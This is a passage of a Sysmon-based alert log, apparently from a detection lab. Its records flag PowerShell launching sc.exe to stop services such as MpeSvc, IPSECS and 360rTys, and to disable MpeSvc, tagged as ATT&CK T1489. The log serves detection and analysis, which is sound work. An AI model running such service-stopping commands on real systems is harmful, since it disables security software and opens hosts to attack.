Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.347",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.987 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e2552b00} +ProcessId: 8092 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.993262200Z"",""eventRecordID"":""3222"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.987\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010e2552b00}\r\nProcessId: 8092\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.987"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010e2552b00}"",""processId"":""8092"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.290",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.932 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001047532b00} +ProcessId: 2028 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.937288800Z"",""eventRecordID"":""3219"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.932\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-001047532b00}\r\nProcessId: 2028\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.932"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-001047532b00}"",""processId"":""2028"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.243",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.880 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bf502b00} +ProcessId: 868 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.883606100Z"",""eventRecordID"":""3216"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.880\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bf502b00}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.880"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010bf502b00}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.224",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.860 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd4f2b00} +ProcessId: 6328 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config MpeSvc Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config MpeSvc Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.863600200Z"",""eventRecordID"":""3215"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.860\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010dd4f2b00}\r\nProcessId: 6328\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config MpeSvc Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.860"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010dd4f2b00}"",""processId"":""6328"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config MpeSvc Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.177",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.818 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010064e2b00} +ProcessId: 7644 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.824021700Z"",""eventRecordID"":""3213"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.818\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010064e2b00}\r\nProcessId: 7644\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.818"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010064e2b00}"",""processId"":""7644"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.131",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.717 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010544b2b00} +ProcessId: 5372 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:29.723147400Z"",""eventRecordID"":""3210"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:29.717\r\nProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010544b2b00}\r\nProcessId: 5372\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:29.717"",""processGuid"":""{df9fc3d3-b3d1-5ecf-0000-0010544b2b00}"",""processId"":""5372"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.085",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:29.683 +ProcessGuid: {df9fc3d3-b3d1-5ecf-0000-0010bb492b00} +ProcessId: 8172 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: 